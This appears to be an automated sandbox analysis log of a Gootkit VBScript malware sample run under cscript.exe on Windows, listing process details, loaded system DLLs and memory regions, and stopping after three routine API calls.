# Flog Txt Version 1
# Analyzer Version: 2.3.2
# Analyzer Build Date: Nov 29 2018 15:24:34
# Log Creation Date: 13.12.2018 14:00:24.241

Process:
	id = "1"
	image_name = "cscript.exe"
	filename = "c:\\windows\\system32\\cscript.exe"
	page_root = "0x3b3af000"
	os_pid = "0xd40"
	os_integrity_level = "0x2000"
	os_privileges = "0x800000"
	monitor_reason = "analysis_target"
	parent_id = "0"
	os_parent_pid = "0x0"
	cmd_line = "\"C:\\Windows\\System32\\CScript.exe\"  \"C:\\Users\\Nd9E1FYi\\Desktop\\gootkit_vbs-6ded37a6.vir.vbs\" "
	cur_dir = "C:\\Users\\Nd9E1FYi\\Desktop\\"
	os_username = "X2VS1CUM\\Nd9E1FYi"
	os_groups = "X2VS1CUM\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x10], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f009" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]

Region:
	              id = 1
	        start_va = 0x7ffe0000
	          end_va = 0x7ffeffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000000007ffe0000"
	        filename = ""

Region:
	              id = 2
	        start_va = 0x17eec80000
	          end_va = 0x17eed7ffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000017eec80000"
	        filename = ""

Region:
	              id = 3
	        start_va = 0x17eee00000
	          end_va = 0x17eeffffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000017eee00000"
	        filename = ""

Region:
	              id = 4
	        start_va = 0x128811e0000
	          end_va = 0x128811fffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000128811e0000"
	        filename = ""

Region:
	              id = 5
	        start_va = 0x12881200000
	          end_va = 0x12881214fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000012881200000"
	        filename = ""

Region:
	              id = 6
	        start_va = 0x12881220000
	          end_va = 0x12881223fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000012881220000"
	        filename = ""

Region:
	              id = 7
	        start_va = 0x12881230000
	          end_va = 0x12881230fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000012881230000"
	        filename = ""

Region:
	              id = 8
	        start_va = 0x12881240000
	          end_va = 0x12881241fff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000012881240000"
	        filename = ""

Region:
	              id = 9
	        start_va = 0x7df5ff030000
	          end_va = 0x7ff5ff02ffff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00007df5ff030000"
	        filename = ""

Region:
	              id = 10
	        start_va = 0x7ff6c3560000
	          end_va = 0x7ff6c3582fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00007ff6c3560000"
	        filename = ""

Region:
	              id = 11
	        start_va = 0x7ff6c3d30000
	          end_va = 0x7ff6c3d5efff
	     entry_point = 0x7ff6c3d30000
	     region_type = mapped_file
	            name = "cscript.exe"
	        filename = "\\Windows\\System32\\cscript.exe" (normalized: "c:\\windows\\system32\\cscript.exe")

Region:
	              id = 12
	        start_va = 0x7ffc15630000
	          end_va = 0x7ffc157f0fff
	     entry_point = 0x7ffc15630000
	     region_type = mapped_file
	            name = "ntdll.dll"
	        filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll")

Region:
	              id = 155
	        start_va = 0x12881370000
	          end_va = 0x1288146ffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000012881370000"
	        filename = ""

Region:
	              id = 156
	        start_va = 0x7ffc12840000
	          end_va = 0x7ffc12a27fff
	     entry_point = 0x7ffc12840000
	     region_type = mapped_file
	            name = "kernelbase.dll"
	        filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll")

Region:
	              id = 157
	        start_va = 0x7ffc145f0000
	          end_va = 0x7ffc1469cfff
	     entry_point = 0x7ffc145f0000
	     region_type = mapped_file
	            name = "kernel32.dll"
	        filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll")

Region:
	              id = 231
	        start_va = 0x17ef000000
	          end_va = 0x17ef0fffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000017ef000000"
	        filename = ""

Region:
	              id = 232
	        start_va = 0x128811e0000
	          end_va = 0x128811effff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000128811e0000"
	        filename = ""

Region:
	              id = 233
	        start_va = 0x128811f0000
	          end_va = 0x128811f6fff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000128811f0000"
	        filename = ""

Region:
	              id = 234
	        start_va = 0x12881250000
	          end_va = 0x1288130dfff
	     entry_point = 0x12881250000
	     region_type = mapped_file
	            name = "locale.nls"
	        filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls")

Region:
	              id = 235
	        start_va = 0x7ff6c3460000
	          end_va = 0x7ff6c355ffff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00007ff6c3460000"
	        filename = ""

Region:
	              id = 236
	        start_va = 0x7ffc07370000
	          end_va = 0x7ffc07379fff
	     entry_point = 0x7ffc07370000
	     region_type = mapped_file
	            name = "version.dll"
	        filename = "\\Windows\\System32\\version.dll" (normalized: "c:\\windows\\system32\\version.dll")

Region:
	              id = 237
	        start_va = 0x7ffc12670000
	          end_va = 0x7ffc126d9fff
	     entry_point = 0x7ffc12670000
	     region_type = mapped_file
	            name = "bcryptprimitives.dll"
	        filename = "\\Windows\\System32\\bcryptprimitives.dll" (normalized: "c:\\windows\\system32\\bcryptprimitives.dll")

Region:
	              id = 238
	        start_va = 0x7ffc141a0000
	          end_va = 0x7ffc14325fff
	     entry_point = 0x7ffc141a0000
	     region_type = mapped_file
	            name = "gdi32.dll"
	        filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll")

Region:
	              id = 239
	        start_va = 0x7ffc14700000
	          end_va = 0x7ffc1481bfff
	     entry_point = 0x7ffc14700000
	     region_type = mapped_file
	            name = "rpcrt4.dll"
	        filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll")

Region:
	              id = 240
	        start_va = 0x7ffc148c0000
	          end_va = 0x7ffc14b3cfff
	     entry_point = 0x7ffc148c0000
	     region_type = mapped_file
	            name = "combase.dll"
	        filename = "\\Windows\\System32\\combase.dll" (normalized: "c:\\windows\\system32\\combase.dll")

Region:
	              id = 241
	        start_va = 0x7ffc14bb0000
	          end_va = 0x7ffc14cf2fff
	     entry_point = 0x7ffc14bb0000
	     region_type = mapped_file
	            name = "ole32.dll"
	        filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll")

Region:
	              id = 242
	        start_va = 0x7ffc14d10000
	          end_va = 0x7ffc14e65fff
	     entry_point = 0x7ffc14d10000
	     region_type = mapped_file
	            name = "user32.dll"
	        filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll")

Region:
	              id = 243
	        start_va = 0x7ffc152a0000
	          end_va = 0x7ffc15360fff
	     entry_point = 0x7ffc152a0000
	     region_type = mapped_file
	            name = "oleaut32.dll"
	        filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll")

Region:
	              id = 244
	        start_va = 0x7ffc15480000
	          end_va = 0x7ffc154dafff
	     entry_point = 0x7ffc15480000
	     region_type = mapped_file
	            name = "sechost.dll"
	        filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll")

Region:
	              id = 245
	        start_va = 0x7ffc154e0000
	          end_va = 0x7ffc15586fff
	     entry_point = 0x7ffc154e0000
	     region_type = mapped_file
	            name = "advapi32.dll"
	        filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll")

Region:
	              id = 246
	        start_va = 0x7ffc15590000
	          end_va = 0x7ffc1562cfff
	     entry_point = 0x7ffc15590000
	     region_type = mapped_file
	            name = "msvcrt.dll"
	        filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll")

Region:
	              id = 247
	        start_va = 0x12881310000
	          end_va = 0x12881316fff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000012881310000"
	        filename = ""

Region:
	              id = 248
	        start_va = 0x128815a0000
	          end_va = 0x128815affff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000128815a0000"
	        filename = ""

Region:
	              id = 249
	        start_va = 0x128815b0000
	          end_va = 0x12881737fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000128815b0000"
	        filename = ""

Region:
	              id = 250
	        start_va = 0x7ffc14820000
	          end_va = 0x7ffc1485afff
	     entry_point = 0x7ffc14820000
	     region_type = mapped_file
	            name = "imm32.dll"
	        filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll")

Region:
	              id = 251
	        start_va = 0x12881320000
	          end_va = 0x12881321fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000012881320000"
	        filename = ""

Region:
	              id = 252
	        start_va = 0x12881330000
	          end_va = 0x12881330fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000012881330000"
	        filename = ""

Region:
	              id = 253
	        start_va = 0x12881340000
	          end_va = 0x12881340fff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000012881340000"
	        filename = ""

Region:
	              id = 254
	        start_va = 0x12881350000
	          end_va = 0x12881350fff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000012881350000"
	        filename = ""

Region:
	              id = 255
	        start_va = 0x12881740000
	          end_va = 0x128818c0fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000012881740000"
	        filename = ""

Region:
	              id = 256
	        start_va = 0x128818d0000
	          end_va = 0x12882ccffff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000128818d0000"
	        filename = ""

Region:
	              id = 257
	        start_va = 0x12882cd0000
	          end_va = 0x128830cafff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000012882cd0000"
	        filename = ""

Region:
	              id = 258
	        start_va = 0x12881470000
	          end_va = 0x1288154cfff
	     entry_point = 0x12881470000
	     region_type = mapped_file
	            name = "rpcss.dll"
	        filename = "\\Windows\\System32\\rpcss.dll" (normalized: "c:\\windows\\system32\\rpcss.dll")

Region:
	              id = 259
	        start_va = 0x7ffc11cd0000
	          end_va = 0x7ffc11cdefff
	     entry_point = 0x7ffc11cd0000
	     region_type = mapped_file
	            name = "kernel.appcore.dll"
	        filename = "\\Windows\\System32\\kernel.appcore.dll" (normalized: "c:\\windows\\system32\\kernel.appcore.dll")

Region:
	              id = 260
	        start_va = 0x7ffc10810000
	          end_va = 0x7ffc108a5fff
	     entry_point = 0x7ffc10810000
	     region_type = mapped_file
	            name = "uxtheme.dll"
	        filename = "\\Windows\\System32\\uxtheme.dll" (normalized: "c:\\windows\\system32\\uxtheme.dll")

Region:
	              id = 261
	        start_va = 0x12881470000
	          end_va = 0x1288159ffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000012881470000"
	        filename = ""

Region:
	              id = 262
	        start_va = 0x128830d0000
	          end_va = 0x12883406fff
	     entry_point = 0x128830d0000
	     region_type = mapped_file
	            name = "sortdefault.nls"
	        filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls")

Region:
	              id = 263
	        start_va = 0x12881360000
	          end_va = 0x12881368fff
	     entry_point = 0x12881360000
	     region_type = mapped_file
	            name = "cscript.exe"
	        filename = "\\Windows\\System32\\cscript.exe" (normalized: "c:\\windows\\system32\\cscript.exe")

Region:
	              id = 264
	        start_va = 0x7ffc11ae0000
	          end_va = 0x7ffc11b78fff
	     entry_point = 0x7ffc11ae0000
	     region_type = mapped_file
	            name = "sxs.dll"
	        filename = "\\Windows\\System32\\sxs.dll" (normalized: "c:\\windows\\system32\\sxs.dll")

Region:
	              id = 265
	        start_va = 0x17ef100000
	          end_va = 0x17ef1fffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000017ef100000"
	        filename = ""

Region:
	              id = 266
	        start_va = 0x7ffc12ae0000
	          end_va = 0x7ffc12c39fff
	     entry_point = 0x7ffc12ae0000
	     region_type = mapped_file
	            name = "msctf.dll"
	        filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll")

Region:
	              id = 267
	        start_va = 0x12881470000
	          end_va = 0x12881470fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000012881470000"
	        filename = ""

Region:
	              id = 268
	        start_va = 0x12881590000
	          end_va = 0x1288159ffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000012881590000"
	        filename = ""

Region:
	              id = 269
	        start_va = 0x12881470000
	          end_va = 0x1288152bfff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000012881470000"
	        filename = ""

Region:
	              id = 270
	        start_va = 0x12881530000
	          end_va = 0x12881533fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000012881530000"
	        filename = ""

Region:
	              id = 271
	        start_va = 0x7ffc0fcd0000
	          end_va = 0x7ffc0fcf1fff
	     entry_point = 0x7ffc0fcd0000
	     region_type = mapped_file
	            name = "dwmapi.dll"
	        filename = "\\Windows\\System32\\dwmapi.dll" (normalized: "c:\\windows\\system32\\dwmapi.dll")

Region:
	              id = 272
	        start_va = 0x12881540000
	          end_va = 0x12881540fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000012881540000"
	        filename = ""

Region:
	              id = 273
	        start_va = 0x7ffc12a30000
	          end_va = 0x7ffc12ad6fff
	     entry_point = 0x7ffc12a30000
	     region_type = mapped_file
	            name = "clbcatq.dll"
	        filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll")

Region:
	              id = 274
	        start_va = 0x12881550000
	          end_va = 0x12881550fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000012881550000"
	        filename = ""

Region:
	              id = 275
	        start_va = 0x7ffbf8e90000
	          end_va = 0x7ffbf8f28fff
	     entry_point = 0x7ffbf8e90000
	     region_type = mapped_file
	            name = "vbscript.dll"
	        filename = "\\Windows\\System32\\vbscript.dll" (normalized: "c:\\windows\\system32\\vbscript.dll")

Region:
	              id = 276
	        start_va = 0x7ffc0b3d0000
	          end_va = 0x7ffc0b3dffff
	     entry_point = 0x7ffc0b3d0000
	     region_type = mapped_file
	            name = "amsi.dll"
	        filename = "\\Windows\\System32\\amsi.dll" (normalized: "c:\\windows\\system32\\amsi.dll")

Region:
	              id = 277
	        start_va = 0x12881560000
	          end_va = 0x1288157cfff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000012881560000"
	        filename = ""

Region:
	              id = 278
	        start_va = 0x7ffc02db0000
	          end_va = 0x7ffc02dbbfff
	     entry_point = 0x7ffc02db0000
	     region_type = mapped_file
	            name = "wldp.dll"
	        filename = "\\Windows\\System32\\wldp.dll" (normalized: "c:\\windows\\system32\\wldp.dll")

Region:
	              id = 279
	        start_va = 0x7ffc11d00000
	          end_va = 0x7ffc11ec6fff
	     entry_point = 0x7ffc11d00000
	     region_type = mapped_file
	            name = "crypt32.dll"
	        filename = "\\Windows\\System32\\crypt32.dll" (normalized: "c:\\windows\\system32\\crypt32.dll")

Region:
	              id = 280
	        start_va = 0x7ffc11c50000
	          end_va = 0x7ffc11c5ffff
	     entry_point = 0x7ffc11c50000
	     region_type = mapped_file
	            name = "msasn1.dll"
	        filename = "\\Windows\\System32\\msasn1.dll" (normalized: "c:\\windows\\system32\\msasn1.dll")

Region:
	              id = 281
	        start_va = 0x7ffc12730000
	          end_va = 0x7ffc12784fff
	     entry_point = 0x7ffc12730000
	     region_type = mapped_file
	            name = "wintrust.dll"
	        filename = "\\Windows\\System32\\wintrust.dll" (normalized: "c:\\windows\\system32\\wintrust.dll")

Region:
	              id = 282
	        start_va = 0x7ffc115d0000
	          end_va = 0x7ffc115e6fff
	     entry_point = 0x7ffc115d0000
	     region_type = mapped_file
	            name = "cryptsp.dll"
	        filename = "\\Windows\\System32\\cryptsp.dll" (normalized: "c:\\windows\\system32\\cryptsp.dll")

Region:
	              id = 283
	        start_va = 0x7ffc11260000
	          end_va = 0x7ffc11293fff
	     entry_point = 0x7ffc11260000
	     region_type = mapped_file
	            name = "rsaenh.dll"
	        filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll")

Region:
	              id = 284
	        start_va = 0x7ffc11b80000
	          end_va = 0x7ffc11ba8fff
	     entry_point = 0x7ffc11b80000
	     region_type = mapped_file
	            name = "bcrypt.dll"
	        filename = "\\Windows\\System32\\bcrypt.dll" (normalized: "c:\\windows\\system32\\bcrypt.dll")

Region:
	              id = 285
	        start_va = 0x7ffc116f0000
	          end_va = 0x7ffc116fafff
	     entry_point = 0x7ffc116f0000
	     region_type = mapped_file
	            name = "cryptbase.dll"
	        filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll")

Region:
	              id = 286
	        start_va = 0x17ef200000
	          end_va = 0x17ef2fffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000017ef200000"
	        filename = ""

Region:
	              id = 287
	        start_va = 0x12881560000
	          end_va = 0x1288157cfff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000012881560000"
	        filename = ""

Region:
	              id = 288
	        start_va = 0x7ffc0aaa0000
	          end_va = 0x7ffc0aaabfff
	     entry_point = 0x7ffc0aaa0000
	     region_type = mapped_file
	            name = "msisip.dll"
	        filename = "\\Windows\\System32\\msisip.dll" (normalized: "c:\\windows\\system32\\msisip.dll")

Region:
	              id = 289
	        start_va = 0x7ffc15410000
	          end_va = 0x7ffc1547efff
	     entry_point = 0x7ffc15410000
	     region_type = mapped_file
	            name = "coml2.dll"
	        filename = "\\Windows\\System32\\coml2.dll" (normalized: "c:\\windows\\system32\\coml2.dll")

Region:
	              id = 290
	        start_va = 0x12883410000
	          end_va = 0x1288440ffff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000012883410000"
	        filename = ""

Region:
	              id = 291
	        start_va = 0x12884410000
	          end_va = 0x1288442cfff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000012884410000"
	        filename = ""

Region:
	              id = 292
	        start_va = 0x17ef300000
	          end_va = 0x17ef3fffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000017ef300000"
	        filename = ""

Region:
	              id = 293
	        start_va = 0x7ffbfbb40000
	          end_va = 0x7ffbfbb5dfff
	     entry_point = 0x7ffbfbb40000
	     region_type = mapped_file
	            name = "wshext.dll"
	        filename = "\\Windows\\System32\\wshext.dll" (normalized: "c:\\windows\\system32\\wshext.dll")

Region:
	              id = 294
	        start_va = 0x7ffc12c40000
	          end_va = 0x7ffc1419efff
	     entry_point = 0x7ffc12c40000
	     region_type = mapped_file
	            name = "shell32.dll"
	        filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll")

Region:
	              id = 295
	        start_va = 0x7ffc126e0000
	          end_va = 0x7ffc12722fff
	     entry_point = 0x7ffc126e0000
	     region_type = mapped_file
	            name = "cfgmgr32.dll"
	        filename = "\\Windows\\System32\\cfgmgr32.dll" (normalized: "c:\\windows\\system32\\cfgmgr32.dll")

Region:
	              id = 296
	        start_va = 0x7ffc11f60000
	          end_va = 0x7ffc125a3fff
	     entry_point = 0x7ffc11f60000
	     region_type = mapped_file
	            name = "windows.storage.dll"
	        filename = "\\Windows\\System32\\windows.storage.dll" (normalized: "c:\\windows\\system32\\windows.storage.dll")

Region:
	              id = 297
	        start_va = 0x7ffc14860000
	          end_va = 0x7ffc148b1fff
	     entry_point = 0x7ffc14860000
	     region_type = mapped_file
	            name = "shlwapi.dll"
	        filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll")

Region:
	              id = 298
	        start_va = 0x7ffc125b0000
	          end_va = 0x7ffc12664fff
	     entry_point = 0x7ffc125b0000
	     region_type = mapped_file
	            name = "shcore.dll"
	        filename = "\\Windows\\System32\\SHCore.dll" (normalized: "c:\\windows\\system32\\shcore.dll")

Region:
	              id = 299
	        start_va = 0x7ffc11c60000
	          end_va = 0x7ffc11caafff
	     entry_point = 0x7ffc11c60000
	     region_type = mapped_file
	            name = "powrprof.dll"
	        filename = "\\Windows\\System32\\powrprof.dll" (normalized: "c:\\windows\\system32\\powrprof.dll")

Region:
	              id = 300
	        start_va = 0x7ffc11cb0000
	          end_va = 0x7ffc11cc3fff
	     entry_point = 0x7ffc11cb0000
	     region_type = mapped_file
	            name = "profapi.dll"
	        filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll")

Region:
	              id = 301
	        start_va = 0x12883410000
	          end_va = 0x1288350ffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000012883410000"
	        filename = ""

Region:
	              id = 302
	        start_va = 0x7ffbfae60000
	          end_va = 0x7ffbfaea3fff
	     entry_point = 0x7ffbfae60000
	     region_type = mapped_file
	            name = "scrobj.dll"
	        filename = "\\Windows\\System32\\scrobj.dll" (normalized: "c:\\windows\\system32\\scrobj.dll")

Region:
	              id = 303
	        start_va = 0x12881560000
	          end_va = 0x1288156ffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000012881560000"
	        filename = ""

Region:
	              id = 304
	        start_va = 0x12883510000
	          end_va = 0x1288360ffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000012883510000"
	        filename = ""

Region:
	              id = 305
	        start_va = 0x12883610000
	          end_va = 0x1288380ffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000012883610000"
	        filename = ""

Region:
	              id = 306
	        start_va = 0x12881570000
	          end_va = 0x12881581fff
	     entry_point = 0x12881570000
	     region_type = mapped_file
	            name = "vbscript.dll"
	        filename = "\\Windows\\System32\\vbscript.dll" (normalized: "c:\\windows\\system32\\vbscript.dll")

Region:
	              id = 307
	        start_va = 0x7ffbfae30000
	          end_va = 0x7ffbfae58fff
	     entry_point = 0x7ffbfae30000
	     region_type = mapped_file
	            name = "wshom.ocx"
	        filename = "\\Windows\\System32\\wshom.ocx" (normalized: "c:\\windows\\system32\\wshom.ocx")

Region:
	              id = 308
	        start_va = 0x7ffc0a0b0000
	          end_va = 0x7ffc0a0cafff
	     entry_point = 0x7ffc0a0b0000
	     region_type = mapped_file
	            name = "mpr.dll"
	        filename = "\\Windows\\System32\\mpr.dll" (normalized: "c:\\windows\\system32\\mpr.dll")

Region:
	              id = 309
	        start_va = 0x7ffbf9eb0000
	          end_va = 0x7ffbf9ee4fff
	     entry_point = 0x7ffbf9eb0000
	     region_type = mapped_file
	            name = "scrrun.dll"
	        filename = "\\Windows\\System32\\scrrun.dll" (normalized: "c:\\windows\\system32\\scrrun.dll")

Region:
	              id = 310
	        start_va = 0x12883810000
	          end_va = 0x12883822fff
	     entry_point = 0x12883810000
	     region_type = mapped_file
	            name = "wshom.ocx"
	        filename = "\\Windows\\System32\\wshom.ocx" (normalized: "c:\\windows\\system32\\wshom.ocx")

Region:
	              id = 311
	        start_va = 0x12883830000
	          end_va = 0x12883830fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000012883830000"
	        filename = ""

Region:
	              id = 312
	        start_va = 0x17ef400000
	          end_va = 0x17ef4fffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000017ef400000"
	        filename = ""

Region:
	              id = 313
	        start_va = 0x7ffc101d0000
	          end_va = 0x7ffc10355fff
	     entry_point = 0x7ffc101d0000
	     region_type = mapped_file
	            name = "propsys.dll"
	        filename = "\\Windows\\System32\\propsys.dll" (normalized: "c:\\windows\\system32\\propsys.dll")

Region:
	              id = 314
	        start_va = 0x17ef500000
	          end_va = 0x17ef5fffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000017ef500000"
	        filename = ""

Region:
	              id = 315
	        start_va = 0x17ef600000
	          end_va = 0x17ef6fffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000017ef600000"
	        filename = ""

Region:
	              id = 316
	        start_va = 0x17ef700000
	          end_va = 0x17ef7fffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000017ef700000"
	        filename = ""

Region:
	              id = 317
	        start_va = 0x7ffc0f200000
	          end_va = 0x7ffc0f692fff
	     entry_point = 0x7ffc0f200000
	     region_type = mapped_file
	            name = "actxprxy.dll"
	        filename = "\\Windows\\System32\\actxprxy.dll" (normalized: "c:\\windows\\system32\\actxprxy.dll")

Region:
	              id = 318
	        start_va = 0x12883840000
	          end_va = 0x12883843fff
	     entry_point = 0x12883840000
	     region_type = mapped_file
	            name = "cversions.2.db"
	        filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db")

Region:
	              id = 319
	        start_va = 0x12883850000
	          end_va = 0x12883863fff
	     entry_point = 0x12883850000
	     region_type = mapped_file
	            name = "{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x0000000000000027.db"
	        filename = "\\Users\\Nd9E1FYi\\AppData\\Local\\Microsoft\\Windows\\Caches\\{AFBF9F1A-8EE8-4C77-AF34-C647E37CA0D9}.1.ver0x0000000000000027.db" (normalized: "c:\\users\\nd9e1fyi\\appdata\\local\\microsoft\\windows\\caches\\{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x0000000000000027.db")

Region:
	              id = 320
	        start_va = 0x12883870000
	          end_va = 0x12883870fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000012883870000"
	        filename = ""

Region:
	              id = 321
	        start_va = 0x12883880000
	          end_va = 0x128838c4fff
	     entry_point = 0x12883880000
	     region_type = mapped_file
	            name = "{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x0000000000000005.db"
	        filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x0000000000000005.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x0000000000000005.db")

Region:
	              id = 322
	        start_va = 0x128838d0000
	          end_va = 0x128838d3fff
	     entry_point = 0x128838d0000
	     region_type = mapped_file
	            name = "cversions.2.db"
	        filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db")

Region:
	              id = 323
	        start_va = 0x128838e0000
	          end_va = 0x1288396dfff
	     entry_point = 0x128838e0000
	     region_type = mapped_file
	            name = "{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000001.db"
	        filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{DDF571F2-BE98-426D-8288-1A9A39C3FDA2}.2.ver0x0000000000000001.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000001.db")

Region:
	              id = 324
	        start_va = 0x7ffc071a0000
	          end_va = 0x7ffc07357fff
	     entry_point = 0x7ffc071a0000
	     region_type = mapped_file
	            name = "urlmon.dll"
	        filename = "\\Windows\\System32\\urlmon.dll" (normalized: "c:\\windows\\system32\\urlmon.dll")

Region:
	              id = 325
	        start_va = 0x7ffc0bc60000
	          end_va = 0x7ffc0bfe1fff
	     entry_point = 0x7ffc0bc60000
	     region_type = mapped_file
	            name = "iertutil.dll"
	        filename = "\\Windows\\System32\\iertutil.dll" (normalized: "c:\\windows\\system32\\iertutil.dll")

Region:
	              id = 326
	        start_va = 0x7ffc118d0000
	          end_va = 0x7ffc118fcfff
	     entry_point = 0x7ffc118d0000
	     region_type = mapped_file
	            name = "sspicli.dll"
	        filename = "\\Windows\\System32\\sspicli.dll" (normalized: "c:\\windows\\system32\\sspicli.dll")

Region:
	              id = 894
	        start_va = 0x12883970000
	          end_va = 0x12883970fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000012883970000"
	        filename = ""


Thread:
	id = 1
	os_tid = 0xd50

	[0029.628] GetModuleHandleA (lpModuleName=0x0) returned 0x7ff6c3d30000
	[0029.628] GetVersionExA (in: lpVersionInformation=0x17eed7f980*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x17eed7f980*(dwOSVersionInfoSize=0x94, dwMajorVersion=0xa, dwMinorVersion=0x0, dwBuildNumber=0x295a, dwPlatformId=0x2, szCSDVersion="")) returned 1
	[0029.628] GetUserDefaultLCID () returned 0x409
